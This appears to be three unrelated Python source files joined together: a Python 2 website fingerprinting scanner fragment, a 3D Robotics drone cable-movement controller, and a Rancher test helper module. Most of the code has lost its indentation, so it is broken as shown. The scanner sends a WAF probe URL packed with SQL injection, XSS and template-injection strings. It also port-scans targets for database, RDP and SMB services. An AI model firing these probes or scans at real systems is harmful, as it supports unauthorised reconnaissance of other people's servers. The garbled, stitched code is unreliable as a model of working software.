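# lib.fingerprint.FingerprintLoader):
#   hashes  entries look like  "path|cms-name|md5-of-response-body"
#   pages   entries look like  "path|cms-name|expected-status-code"
#   headers entries look like  "path|cms-name|header-regex"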
def CheckHash(self, json):
TaskList = queue.Queue()
for item in json:
TaskList.put(item)
while True:
if self._thread > self._counter:
self._counter += 1
thread = threading.Thread(target=self._HashChecker, args=[TaskList.get()])
thread.start()
if not TaskList.qsize():
thread.join()
break
def _HashChecker(self, json):
try:
url, cms, hash = json.split('|')
except Exception, e:
print '[!] Failed to unpack json: %s' %(str(e))
self._counter -= 1
return
try:
if debug:
print '[^] DEBUG: Checked hash %s' %(hash)
resp = urllib2.urlopen('http://%s/%s' %(self.url, url), timeout=3).read()
if hashlib.md5(resp).hexdigest() == hash:
if cms not in self.CMS:
print '[+] Potential CMS: %s' % (str(cms))
self.CMS.append(cms)
except urllib2.HTTPError:
pass
except Exception, e:
print '[!] Failed checking cms: %s' %(str(e))
self._counter -= 1
return
def CheckPage(self,json):
TaskList = queue.Queue()
if not json:
return
for i in json:
TaskList.put(i)
while True:
if self._counter < self._thread:
self._counter += 1
thread = threading.Thread(target=self._PageChecker, args=[TaskList.get()])
thread.start()
if not TaskList.qsize():
thread.join()
break
pass
def _PageChecker(self,task):
try:
url, cms, code = re.split('\|', task)
if requests.get('http://%s%s' %(self.url, url), timeout=3).status_code == int(code):
self.CMS.append(cms)
print '[+] Potential CMS of site %s: %s' %(self.url, cms)
except Exception,e :
print str(e)
self._counter -= 1
return
def CheckHeader(self,json):
TaskList = queue.Queue()
for i in json:
TaskList.put(i)
while not TaskList.empty():
if self._counter < self._thread:
self._counter += 1
thread = threading.Thread(target=self._HeaderChecker, args=(TaskList.get(),))
thread.start()
return
def _HeaderChecker(self,task):
try:
url, cms, header = re.split('\|', task)
if debug:
print '[^] Checked header: %s' %(header)
if re.findall(header, str(requests.get('http://%s%s' %(self.url, url), timeout=3).headers)):
self.CMS.append(cms)
print '[+] Potential CMS of site %s: %s' %(self.url, cms)
except Exception, e:
print str(e)
self._counter -= 1
pass
def FetchPage(self):
try:
return requests.get(self.url).text
except Exception, e:
return None
def _LoadCMSVersion(self):
CMSVersionList = []
if not self.CMS:
print '[!] CMS not identified.'
return
for i in self.CMS:
CMSVersionList.append(self._FingerprintLoader.LoadCmsVerionFingerprint())
return CMSVersionList
def CheckCMSVersion(self):
CMSVersionList = self._LoadCMSVersion()
if not CMSVersionList:
print '[!] CMS Version of %s is not available.' %(str(self.CMS))
return
if not len(CMSVersionList):
print '[!] Version check for this cms is not available.'
for cms in CMSVersionList:
if not cms:
continue
CMSVersionFingerprintList = cms['version']
thread = threading.Thread(target=self._CMSVersionChecker, args=(CMSVersionFingerprintList,))
thread.start()
return
def _CMSVersionChecker(self,json):
try:
CMSVersionList = queue.Queue()
for i in json:
CMSVersionList.put(i)
while self._counter < self._thread:
self._counter += 1
thread = threading.Thread(target=self._CheckKeyword, args=(CMSVersionList.get(),))
thread.setDaemon(True)
thread.start()
except Exception, e:
print '[!] Error loading CMS version: %s' %(str(e))
return
def _CheckKeyword(self,task):
version, url, keyword = re.split('\|', task)
try:
if re.findall(keyword, requests.get('http://%s%s' %(self.url, url), timeout=3).text):
self._CMSVerison.append(version)
except Exception, e:
print '[!] Error checking CMS version: %s' %(str(e))
self._counter -= 1
return
def CheckWaf(self):
WafList = self._FingerprintLoader.LoadWafFingerprint()
if not WafList:
print '[!] Unable to load WAF fingerprint.'
try:
resp = requests.get('http://%s/?union select 1 and 1=2 and updatexml(1,concat(0x7e,(0x23333),0x7e),1) <script>alert(1)</script> {{1+1}}' %(self.url), timeout=3).text
if not resp:
print '[!] Error fetching page: Empty response.'
return
WafFingerprint = WafList['waf']
for fingerprint in WafFingerprint:
waf, fingerprint = re.split('\|', fingerprint)
if re.findall(fingerprint, resp):
self.WAF.append(waf)
if len(self.WAF) == 0:
print '[+] Check completed, No waf identified.'
else:
print '[+] Check completed, waf identified:'
for waf in self.WAF:
print '[+] WAF of %s is %s' %(self.url, waf)
except requests.ConnectionError:
print '[*] RST flag stopped. WAF identify is not available.'
return
except Exception, e:
print '[!] Error connecting site: %s' %(str(e))
return
return self.WAF
def _WafChecker(self,task):
pass
def CheckDatabase(self):
sess = socket.socket(2,1)
sess.settimeout(3)
try:
print '[*] Starting connection scan.'
sess.connect((self.site,1433))
self.Database = 'mssql (open)'
except:
pass
try:
sess = socket.socket(2,1)
sess.settimeout(3)
sess.connect((self.site,3306))
buf = sess.recv(1024)
if re.findall('mariadb', buf, re.I+re.M):
self.Database = 'mariadb (open)'
else:
self.Database = 'mysql (open)'
except socket.timeout:
pass
except Exception, e:
print '[!] Error during connection scan: %s' %(str(e))
pass
print '[*] Connection scan completed.'
if self.Database:
print '[+] Database type: %s' %(self.Database)
return self.Database
try:
Headers = requests.get('http://%s/' %(self.site), timeout=3).headers
RawHeader = ''
for item in Headers:
RawHeader += item
RawHeader += ':'
RawHeader += Headers[item]
RawHeader += '\n'
Headers = RawHeader
if re.findall('(?i)mysql', Headers):
self.Database = 'mysql'
elif re.findall('(?i)mariadb', Headers):
self.Database = 'mariadb'
            elif re.findall('(?i)sql server', Headers):
self.Database = 'mssql'
elif re.findall('(?i)mongodb', Headers):
self.Database = 'mongodb'
elif re.findall('postgre', Headers):
                self.Database = 'postgresql'
else:
self.Database = 'unknown'
print '[+] Database type: %s' %(self.Database)
except Exception, e:
print '[!] Error during header scan: %s' %(str(e))
print '[+] Database check completed.'
return self.Database
def CheckSystem(self):
sess = socket.socket(2,1)
sess.settimeout(3)
try:
Headers = requests.get('http://%s/' %(self.site), timeout=3).headers
if re.findall('(?i)iis|asp|aspx|windows|\.net|microsoft',str(Headers)):
self.OperatingSystem = 'Windows'
elif re.findall('(?i)Linux|ubuntu|centos|redhat|debian|manjaro|arch|deepin|mint|suse|oracle', str(Headers)):
self.OperatingSystem = 'Linux'
elif re.findall('(?i)bsd', str(Headers)):
self.OperatingSystem = 'BSD'
elif re.findall('(?i)unix', str(Headers)):
self.OperatingSystem = 'Unix'
else:
self.OperatingSystem = None
except Exception, e:
print '[!] Error getting server system: %s' %(str(e))
if self.OperatingSystem:
print '[+] Server system is %s' %(str(self.OperatingSystem))
return self.OperatingSystem
try:
PortList = {21: '*nix', 3389: 'windows', 445: 'windows', 1433: 'windows'}
for port in PortList.keys():
try:
sess = socket.socket(2,1)
sess.settimeout(3)
                    sess.connect((self.site, port))
self.OperatingSystem = PortList[port]
                except (socket.timeout, socket.error):
continue
except Exception, e:
print '[!] Error checking system: %s' %(str(e))
pass
if not self.OperatingSystem:
self.OperatingSystem = 'Unknown'
print '[+] Server system is %s' %(self.OperatingSystem)
return self.OperatingSystem
def _Timer(self):
while True:
time.sleep(1)
self._Time += 1
def _ThreadCounter(self):
while not self.StopFlag: # Nasty hack for unknown bugs. todo: Debug
time.sleep(10)
print '[*] Fingerprint Identifier: Time: %d second(s), %s thread(s) working.' %(self._Time, self._counter)
|
cableController.py
|
# cableController.py
# shotmanager
#
# The cable movement controller.
# Runs as a DroneKit-Python script.
#
# Created by Jon Challinger and Will Silva on 1/21/2015.
# Copyright (c) 2016 3D Robotics.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from catmullRom import CatmullRom
from vector3 import *
from numpy import linspace
import math
import threading
import itertools
# epsilon to detect if we've reached a target in meters
TARGET_EPSILON_M = 0.1
# Length of each segment that is assigned a maximum speed based on its maximum curvature
CURVATURE_MAP_RES = 1. # meters
def goldenSection(func, a, b, tol = 1e-5):
gr = 0.61803398875
c = b - gr * (b - a)
d = a + gr * (b - a)
fc = func(c)
fd = func(d)
while abs(c-d) > tol:
if fc < fd:
b = d
d = c
c = b - gr * (b - a)
fd = fc
fc = func(c)
else:
a = c
c = d
d = a + gr * (b - a)
fc = fd
fd = func(d)
return (b+a) / 2.
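# A minimal usage sketch of the search above (illustrative only; this helper is not part of
# the original module and is not referenced elsewhere): goldenSection() narrows [a, b] around
# the minimum of a unimodal function by the golden ratio each iteration, so minimizing
# (x - 2)^2 on [0, 5] should land within tol of 2.0.
def _exampleGoldenSectionUsage():
    '''Locate the minimum of (x - 2)^2 on [0, 5].

    >>> abs(_exampleGoldenSectionUsage() - 2.0) < 1e-3
    True
    '''
    return goldenSection(lambda x: (x - 2.0) ** 2, 0., 5.)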
def constrain(val,minval,maxval):
if val < minval:
return minval
elif val > maxval:
return maxval
return val
class CableController():
def __init__(self, points, maxSpeed, minSpeed, tanAccelLim, normAccelLim, smoothStopP, maxAlt):
# Maximum tangential acceleration along the cable, m/s^2
self.tanAccelLim = tanAccelLim
# Maximum acceleration normal to the cable, m/s^2
self.normAccelLim = normAccelLim
# Smoothness of stops at the endpoints and at targets along the cable
self.smoothStopP = smoothStopP
# Maximum speed along the cable, m/s
self.maxSpeed = maxSpeed
# Minimum speed along the cable, m/s
self.minSpeed = minSpeed
# Minimum allowable position.z, meters (AKA max altitude), Convert Altitude (NEU) to NED
if maxAlt is not None:
self.posZLimit = -maxAlt
else:
self.posZLimit = None
# Input speed
self.desiredSpeed = 0.
# Current speed along the cable, m/s
self.speed = 0.
# Catmull-Rom spline with added virtual tangency control points at either end
self.spline = CatmullRom([points[0]*2 - points[1]]+points+[points[-1]*2 - points[-2]])
# Number of spline segments (should really come from CatmullRom)
self.numSegments = len(points)-1
# Current position in P domain, parameter normalized to cable total arc length
self.currentP = 1.0
# Target position in P domain
self.targetP = self.currentP
# Previously reached target, once set
self.prevReachedTarget = None
# Current segment, ranges from 0 to # of segments-1
self.currentSeg, self.currentU = self.spline.arclengthToNonDimensional(self.currentP)
# Current position as a Vector3, meters
self.position = self.spline.position(self.currentSeg, self.currentU)
# Current velocity as a Vector3, m/s
self.velocity = Vector3()
# Flag to indicate that the maximum altitude has been exceeded
self.maxAltExceeded = False
# Number of segments in curvature map
self.curvatureMapNumSegments = int(math.ceil(self.spline.totalArcLength/CURVATURE_MAP_RES))
# Number of joints in curvature map
self.curvatureMapNumJoints = self.curvatureMapNumSegments+1
# Curvature map joint positions in p domain
self.curvatureMapJointsP, self.curvatureMapSegLengthP = linspace(0., 1., self.curvatureMapNumJoints, retstep = True)
# Curvature map segment length in meters
self.curvatureMapSegLengthM = self.curvatureMapSegLengthP * self.spline.totalArcLength
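        # For instance, a cable with a total arc length of 25.3 m and CURVATURE_MAP_RES = 1 m
        # gives ceil(25.3) = 26 map segments and 27 joints; each segment then spans 1/26 of
        # the P domain, or roughly 0.97 m of cable.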
# Non-dimensional curvature map joint position (cache)
self.curvatureMapJointsNonDimensional = [None for _ in range(self.curvatureMapNumJoints)]
# Speed limits for each curvature map segment (cache)
self.curvatureMapSpeedLimits = [None for _ in range(self.curvatureMapNumSegments)]
# Thread lock on curvature map segments
self.curvatureMapLocks = [threading.Lock() for _ in range(self.curvatureMapNumSegments)]
self.curvatureMapSegmentsComputedLock = threading.Lock()
# number of map segments that have been computed by the curvatureMapThread
self.curvatureMapSegmentsComputed = 0
# flag that indicates to the thread to die
self.poisonPill = False
# setup a worker thread to compute map segment maximum speeds
self.curvatureMapThread = threading.Thread(target=self._computeCurvatureMap)
self.curvatureMapThread.setDaemon(True)
# start the worker thread
self.curvatureMapThread.start()
def __del__(self):
self.poisonPill = True
self.curvatureMapThread.join(timeout = 2)
# Public interface:
def reachedTarget(self):
'''Return True if we've reached the target, else False'''
return abs(self.currentP - self.targetP) * self.spline.totalArcLength < TARGET_EPSILON_M
def setTargetP(self, targetP):
'''Interface to set a target P'''
self.targetP = targetP
def trackSpeed(self, speed):
'''Updates controller desired speed'''
self.desiredSpeed = speed
def update(self, dt):
'''Advances controller along cable by dt'''
# Speed always in direction of target
self.desiredSpeed = math.copysign(self.desiredSpeed, self.targetP - self.currentP)
self.speed = constrain(self._constrainSpeed(self.desiredSpeed), self.speed - self.tanAccelLim*dt, self.speed + self.tanAccelLim*dt)
self._traverse(dt)
def setCurrentP(self,p):
'''Sets the controller's current P position on the cable'''
self.currentP = p
self.currentSeg, self.currentU = self.spline.arclengthToNonDimensional(self.currentP)
def killCurvatureMapThread(self):
'''Sets poisonPill to True so the curvatureMapThread knows to die'''
self.poisonPill = True
# Internal functions:
def _computeCurvatureMap(self):
'''Computes curvature map, prioritizes map construction based on vehicle position and direction of motion'''
while True:
searchStart = self._getCurvatureMapSegment(self.currentP)
if self.speed > 0:
# Search ahead, then behind
for i in range(searchStart, self.curvatureMapNumSegments)+list(reversed(range(0, searchStart))):
if self._computeCurvatureMapSpeedLimit(i):
break
elif self.speed < 0:
# Search behind, then ahead
for i in list(reversed(range(0, searchStart+1)))+range(searchStart+1, self.curvatureMapNumSegments):
if self._computeCurvatureMapSpeedLimit(i):
break
else: # speed == 0
# Search alternately ahead and behind
searchList = [x for t in list(itertools.izip_longest(range(searchStart, self.curvatureMapNumSegments), reversed(range(0, searchStart)))) for x in t if x is not None]
for i in searchList:
if self._computeCurvatureMapSpeedLimit(i):
break
# if all map segments have been computed then quit the thread
with self.curvatureMapSegmentsComputedLock:
if self.curvatureMapSegmentsComputed == self.curvatureMapNumSegments:
self.poisonPill = True
if self.poisonPill:
break
def _computeCurvatureMapSpeedLimit(self, mapSeg):
'''Computes speed limit for the requested map segment'''
with self.curvatureMapLocks[mapSeg]:
# if the speed limit has already been computed for this map segment, then don't do any work
if self.curvatureMapSpeedLimits[mapSeg] is not None:
return False
# if non-dimensional parameter has not yet been created for the associated left joint, then create it
if self.curvatureMapJointsNonDimensional[mapSeg] is None:
self.curvatureMapJointsNonDimensional[mapSeg] = self.spline.arclengthToNonDimensional(self.curvatureMapJointsP[mapSeg])
# if non-dimensional parameter has not yet been created for the associated right joint, then create it
if self.curvatureMapJointsNonDimensional[mapSeg+1] is None:
self.curvatureMapJointsNonDimensional[mapSeg+1] = self.spline.arclengthToNonDimensional(self.curvatureMapJointsP[mapSeg+1])
# split returned non-dimensional parameter tuple (seg,u) into separate values
seg1, u1 = self.curvatureMapJointsNonDimensional[mapSeg]
seg2, u2 = self.curvatureMapJointsNonDimensional[mapSeg+1]
# returns arc length for current spline segment, or the larger of the two segments if our map segment spans across multiple spline segments
maxSegLen = max(self.spline.arcLengths[seg1:seg2+1]) # m
# run a golden section search to find the segment,u pair for the point of maximum curvature in the requested map segment
# (segment,u) are stored as segment+u, e.g. segment 1, u = 0.25 -> 1.25
maxCurvatureSegU = goldenSection(lambda x: -self.spline.curvature(int(x), x-int(x)), seg1+u1, seg2+u2, tol = 1e-1/maxSegLen)
# run a golden section search to find the segment,u pair for the point of minimum Z (aka max altitude)
minPosZSegU = goldenSection(lambda x: self.spline.position(int(x), x-int(x)).z, seg1+u1, seg2+u2, tol = 1e-1/maxSegLen)
# split segment+u into segment,u and evaluate curvature at this point
maxCurvature = self.spline.curvature(int(maxCurvatureSegU),maxCurvatureSegU-int(maxCurvatureSegU))
            # split segment+u into segment,u and evaluate position.z at this point
minPosZ = self.spline.position(int(minPosZSegU),minPosZSegU-int(minPosZSegU)).z #m
# this prevents the copter from traversing segments of the cable
# that are above its altitude limit
if self.posZLimit is not None and minPosZ < self.posZLimit:
self.maxAltExceeded = True
#this cable will breach the altitude limit, make the speed limit for this segment 0 to stop the vehicle
self.curvatureMapSpeedLimits[mapSeg] = 0.
else:
if maxCurvature != 0.:
# limit maxspeed by the max allowable normal acceleration at that point, bounded on the lower end by minSpeed
self.curvatureMapSpeedLimits[mapSeg] = max(math.sqrt(self.normAccelLim / maxCurvature), self.minSpeed)
else:
# if curvature is zero, means a straight segment
self.curvatureMapSpeedLimits[mapSeg] = self.maxSpeed
with self.curvatureMapSegmentsComputedLock:
self.curvatureMapSegmentsComputed += 1
return True
def _getCurvatureMapSpeedLimit(self, mapSeg):
'''Look up the speed limit for the requested map segment'''
# sanitize mapSeg
if mapSeg < 0 or mapSeg >= self.curvatureMapNumSegments:
return 0.
self._computeCurvatureMapSpeedLimit(mapSeg)
return self.curvatureMapSpeedLimits[mapSeg]
def _traverse(self, dt):
''' Advances the controller along the spline '''
spline_vel_unit = self.spline.velocity(self.currentSeg, self.currentU)
spline_vel_norm = spline_vel_unit.normalize()
# advances u by the amount specified by our speed and dt
self.currentU += self.speed * dt / spline_vel_norm
# handle traversing spline segments
if self.currentU > 1.:
if self.currentSeg < self.numSegments-1:
self.currentSeg += 1
self.currentU = 0. # NOTE: this truncates steps which cross spline joints
else:
self.currentU = 1.
elif self.currentU < 0.:
if self.currentSeg > 0:
self.currentSeg -= 1
self.currentU = 1. # NOTE: this truncates steps which cross spline joints
else:
self.currentU = 0.
# calculate our currentP
self.currentP = self.spline.nonDimensionalToArclength(self.currentSeg, self.currentU)[0]
# calculate our position and velocity commands
self.position = self.spline.position(self.currentSeg, self.currentU)
self.velocity = spline_vel_unit * self.speed
def _constrainSpeed(self, speed):
'''Looks ahead and behind current controller position and constrains to a speed limit'''
if speed > 0:
return min(self.maxSpeed, speed, self._getPosSpeedLimit(self.currentP))
elif speed < 0:
return max(-self.maxSpeed, speed, self._getNegSpeedLimit(self.currentP))
return speed
def _speedCurve(self, dist, speed):
'''Returns speed based on the sqrt function or a linear ramp (depending on dist)'''
linear_velocity = self.tanAccelLim / self.smoothStopP
linear_dist = linear_velocity / self.smoothStopP
if speed > linear_velocity:
return math.sqrt(2. * self.tanAccelLim * (speed**2/(2.*self.tanAccelLim) + dist))
else:
p1 = speed / self.smoothStopP
p2 = p1 + dist
if p2 > linear_dist:
return math.sqrt(2. * self.tanAccelLim * (p2 - 0.5*linear_dist))
else:
return p2 * self.smoothStopP
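    # A brief note on the profile above (reasoning inferred from the code, not from any
    # external spec): the sqrt branch follows the constant-deceleration relation
    # v^2 = v0^2 + 2*a*d with a = tanAccelLim, i.e. the speed allowed at distance d from a
    # point requiring speed v0 is sqrt(v0^2 + 2*a*d). Below linear_velocity the profile is a
    # proportional ramp, speed = p * smoothStopP, which avoids an unbounded deceleration
    # command near a stop; the two branches join continuously where p2 equals linear_dist.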
def _maxLookAheadDist(self):
'''Calculate how far it would take to come to a complete stop '''
linear_velocity = self.tanAccelLim / self.smoothStopP
linear_dist = linear_velocity / self.smoothStopP
if abs(self.speed) > linear_velocity:
return 0.5 * abs(self.speed)**2 / self.tanAccelLim + 0.5*linear_dist
else:
return abs(self.speed)/self.smoothStopP
def _getCurvatureMapSegment(self, p):
'''Get the curvature map segment index at the location p'''
return int(min(math.floor(p / self.curvatureMapSegLengthP),self.curvatureMapNumSegments-1))
def _getDistToCurvatureMapSegmentBegin(self, p1, idx):
'''Get distance from p1 to the beginning of the idx curvature map segment in meters'''
p2 = self.curvatureMapJointsP[idx]
return abs(p1-p2) * self.spline.totalArcLength
def _getDistToCurvatureMapSegmentEnd(self, p1, idx):
'''Get distance from p1 to the end of the idx curvature map segment in meters'''
p2 = self.curvatureMapJointsP[idx+1]
return abs(p1-p2) * self.spline.totalArcLength
def _getPosSpeedLimit(self, p):
'''Returns speed limit for a requested arc length normalized parameter, p, moving in the positive direction'''
# Identify our current curvature map segment
mapSeg = self._getCurvatureMapSegment(p)
# get speed limit for the upcoming curvature map segment
nextMapSegSpeed = self._getCurvatureMapSpeedLimit(mapSeg+1)
# get distance (in meters) from current position to start of next curvature map segment
nextMapSegDist = self._getDistToCurvatureMapSegmentEnd(p, mapSeg)
# set speed limit to the minimum of the current curvature map segment and the transition to the next curvature map segment speed
speedLimit = min(self._getCurvatureMapSpeedLimit(mapSeg), self._speedCurve(nextMapSegDist, nextMapSegSpeed)) # m/s
# loop through all remaining segments in that direction
for mapSeg in range(mapSeg+1,self.curvatureMapNumSegments):
# increment distance by another curvature map segment length
nextMapSegDist += self.curvatureMapSegLengthM
# if that distance is greater than the distance it would take to stop, then break to save time (no need to look ahead any further)
if nextMapSegDist > self._maxLookAheadDist():
break
# get curvature map seg speed at this next segment
            nextMapSegSpeed = self._getCurvatureMapSpeedLimit(mapSeg+1) # NOTE: self._getCurvatureMapSpeedLimit(self.curvatureMapNumSegments) is 0
# limit us if the new map segment speed is slower than our current speed limit
speedLimit = min(speedLimit, self._speedCurve(nextMapSegDist, nextMapSegSpeed))
# if targetP is ahead of currentP then check for a speed limit to slow down at the target
if self.targetP >= self.currentP:
speedLimit = min(speedLimit, self._speedCurve(abs(self.targetP - self.currentP)*self.spline.totalArcLength, 0))
return speedLimit
def _getNegSpeedLimit(self, p):
'''Returns speed limit for a requested arc length normalized parameter, p, moving in the negative direction'''
# Identify our current curvature map segment
mapSeg = self._getCurvatureMapSegment(p)
# get speed limit for the previous curvature map segment
prevMapSegSpeed = self._getCurvatureMapSpeedLimit(mapSeg-1)
# get distance (in meters) from current position to start of previous curvature map segment
prevMapSegDist = self._getDistToCurvatureMapSegmentBegin(p, mapSeg)
# set speed limit to the minimum of the current curvature map segment and the transition to the previous curvature map segment speed
speedLimit = min(self._getCurvatureMapSpeedLimit(mapSeg), self._speedCurve(prevMapSegDist, prevMapSegSpeed)) # m/s
# loop through all remaining segments in that direction
for mapSeg in reversed(range(0,mapSeg)):
# increment distance by another curvature map segment length
prevMapSegDist += self.curvatureMapSegLengthM
# if that distance is greater than the distance it would take to stop, then break to save time (no need to look ahead any further)
if prevMapSegDist > self._maxLookAheadDist():
break
# get curvature map seg speed at this previous segment
            prevMapSegSpeed = self._getCurvatureMapSpeedLimit(mapSeg-1) # NOTE: self._getCurvatureMapSpeedLimit(-1) is 0
# limit us if the new map segment speed is slower than our current speed limit
speedLimit = min(speedLimit, self._speedCurve(prevMapSegDist, prevMapSegSpeed))
if self.targetP <= self.currentP:
speedLimit = min(speedLimit, self._speedCurve(abs(self.targetP - self.currentP)*self.spline.totalArcLength, 0))
return -speedLimit
|
common.py
|
import inspect
import json
import os
import random
import subprocess
import ssl
import time
import requests
import ast
import paramiko
import rancher
import pytest
from urllib.parse import urlparse
from rancher import ApiError
from lib.aws import AmazonWebServices
from copy import deepcopy
from threading import Lock
from threading import Thread
import websocket
import base64
DEFAULT_TIMEOUT = 120
DEFAULT_MULTI_CLUSTER_APP_TIMEOUT = 300
DEFAULT_APP_DELETION_TIMEOUT = 360
DEFAULT_MONITORING_TIMEOUT = 180
DEFAULT_CATALOG_TIMEOUT = 15
CATTLE_TEST_URL = os.environ.get('CATTLE_TEST_URL', "")
CATTLE_API_URL = CATTLE_TEST_URL + "/v3"
CATTLE_AUTH_URL = \
CATTLE_TEST_URL + "/v3-public/localproviders/local?action=login"
ADMIN_TOKEN = os.environ.get('ADMIN_TOKEN', "None")
USER_TOKEN = os.environ.get('USER_TOKEN', "None")
USER_PASSWORD = os.environ.get('USER_PASSWORD', "None")
ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', "None")
kube_fname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"k8s_kube_config")
MACHINE_TIMEOUT = float(os.environ.get('RANCHER_MACHINE_TIMEOUT', "1200"))
TEST_OS = os.environ.get('RANCHER_TEST_OS', "linux")
TEST_IMAGE = os.environ.get('RANCHER_TEST_IMAGE', "sangeetha/mytestcontainer")
TEST_IMAGE_NGINX = os.environ.get('RANCHER_TEST_IMAGE_NGINX', "nginx")
TEST_IMAGE_OS_BASE = os.environ.get('RANCHER_TEST_IMAGE_OS_BASE', "ubuntu")
if TEST_OS == "windows":
DEFAULT_TIMEOUT = 300
skip_test_windows_os = pytest.mark.skipif(
TEST_OS == "windows",
reason='Tests Skipped for including Windows nodes cluster')
CLUSTER_NAME = os.environ.get("RANCHER_CLUSTER_NAME", "")
RANCHER_CLEANUP_CLUSTER = \
ast.literal_eval(os.environ.get('RANCHER_CLEANUP_CLUSTER', "True"))
env_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"rancher_env.config")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
AWS_REGION = os.environ.get("AWS_REGION")
AWS_SUBNET = os.environ.get("AWS_SUBNET")
AWS_VPC = os.environ.get("AWS_VPC")
AWS_SG = os.environ.get("AWS_SG")
AWS_ZONE = os.environ.get("AWS_ZONE")
AWS_IAM_PROFILE = os.environ.get("AWS_IAM_PROFILE", "")
AWS_S3_BUCKET_NAME = os.environ.get("AWS_S3_BUCKET_NAME", "")
AWS_S3_BUCKET_FOLDER_NAME = os.environ.get("AWS_S3_BUCKET_FOLDER_NAME", "")
LINODE_ACCESSKEY = os.environ.get('RANCHER_LINODE_ACCESSKEY', "None")
NFS_SERVER_MOUNT_PATH = "/nfs"
TEST_RBAC = ast.literal_eval(os.environ.get('RANCHER_TEST_RBAC', "False"))
if_test_rbac = pytest.mark.skipif(TEST_RBAC is False,
reason='rbac tests are skipped')
TEST_ALL_SNAPSHOT = ast.literal_eval(
os.environ.get('RANCHER_TEST_ALL_SNAPSHOT', "False")
)
if_test_all_snapshot = \
pytest.mark.skipif(TEST_ALL_SNAPSHOT is False,
reason='Snapshots check tests are skipped')
DATA_SUBDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'resource')
# As of release 2.4 default rke scan profile is "rke-cis-1.4"
CIS_SCAN_PROFILE = os.environ.get('RANCHER_CIS_SCAN_PROFILE', "rke-cis-1.4")
# here are all supported roles for RBAC testing
CLUSTER_MEMBER = "cluster-member"
CLUSTER_OWNER = "cluster-owner"
PROJECT_MEMBER = "project-member"
PROJECT_OWNER = "project-owner"
PROJECT_READ_ONLY = "read-only"
rbac_data = {
"project": None,
"namespace": None,
"workload": None,
"p_unshared": None,
"ns_unshared": None,
"wl_unshared": None,
"users": {
CLUSTER_OWNER: {},
CLUSTER_MEMBER: {},
PROJECT_OWNER: {},
PROJECT_MEMBER: {},
PROJECT_READ_ONLY: {},
}
}
auth_rbac_data = {
"project": None,
"namespace": None,
"users": {}
}
# here are the global role templates used for
# testing globalRoleBinding and groupRoleBinding
TEMPLATE_MANAGE_CATALOG = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"*"
],
"resources": [
"catalogs",
"templates",
"templateversions"
]
}
],
"name": "gr-test-manage-catalog",
}
TEMPLATE_LIST_CLUSTER = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"get",
"list",
"watch"
],
"resources": [
"clusters"
]
}
],
"name": "gr-test-list-cluster",
}
# this is used when testing users from a auth provider
AUTH_PROVIDER = os.environ.get('RANCHER_AUTH_PROVIDER', "")
if AUTH_PROVIDER not in ["activeDirectory", "freeIpa", "openLdap", ""]:
pytest.fail("Invalid RANCHER_AUTH_PROVIDER. Please provide one of: "
"activeDirectory, freeIpa, or openLdap (case sensitive).")
NESTED_GROUP_ENABLED = ast.literal_eval(
os.environ.get('RANCHER_NESTED_GROUP_ENABLED', "False"))
# Admin Auth username and the shared password for all auth users
AUTH_USER_PASSWORD = os.environ.get('RANCHER_AUTH_USER_PASSWORD', "")
# the link to log in as an auth user
LOGIN_AS_AUTH_USER_URL = \
CATTLE_TEST_URL + "/v3-public/" \
+ AUTH_PROVIDER + "Providers/" \
+ AUTH_PROVIDER.lower() + "?action=login"
CATTLE_AUTH_PRINCIPAL_URL = CATTLE_TEST_URL + "/v3/principals?action=search"
# This is used for nested group when a third part Auth is enabled
nested_group = {
"auth_info": None,
"users": None,
"group_dic": None,
"groups": None
}
auth_requirements = not AUTH_PROVIDER or not AUTH_USER_PASSWORD
if_test_group_rbac = pytest.mark.skipif(
auth_requirements,
    reason='Group RBAC tests are skipped. '
'Required AUTH env variables '
'have not been set.'
)
def is_windows(os_type=TEST_OS):
return os_type == "windows"
def random_str():
return 'random-{0}-{1}'.format(random_num(), int(time.time()))
def random_num():
return random.randint(0, 1000000)
def random_int(start, end):
return random.randint(start, end)
def random_test_name(name="test"):
return name + "-" + str(random_int(10000, 99999))
def get_admin_client():
return rancher.Client(url=CATTLE_API_URL, token=ADMIN_TOKEN, verify=False)
def get_user_client():
return rancher.Client(url=CATTLE_API_URL, token=USER_TOKEN, verify=False)
def get_client_for_token(token, url=CATTLE_API_URL):
return rancher.Client(url=url, token=token, verify=False)
def get_project_client_for_token(project, token):
p_url = project.links['self'] + '/schemas'
p_client = rancher.Client(url=p_url, token=token, verify=False)
return p_client
def get_cluster_client_for_token(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def up(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def wait_state(client, obj, state, timeout=DEFAULT_TIMEOUT):
wait_for(lambda: client.reload(obj).state == state, timeout)
return client.reload(obj)
def wait_for_condition(client, resource, check_function, fail_handler=None,
timeout=DEFAULT_TIMEOUT):
start = time.time()
resource = client.reload(resource)
while not check_function(resource):
if time.time() - start > timeout:
exceptionMsg = 'Timeout waiting for ' + resource.baseType + \
' to satisfy condition: ' + \
inspect.getsource(check_function)
if fail_handler:
exceptionMsg = exceptionMsg + fail_handler(resource)
raise Exception(exceptionMsg)
time.sleep(.5)
resource = client.reload(resource)
return resource
def wait_for(callback, timeout=DEFAULT_TIMEOUT, timeout_message=None):
start = time.time()
ret = callback()
while ret is None or ret is False:
time.sleep(.5)
if time.time() - start > timeout:
if timeout_message:
raise Exception(timeout_message)
else:
raise Exception('Timeout waiting for condition')
ret = callback()
return ret
def random_name():
return "test" + "-" + str(random_int(10000, 99999))
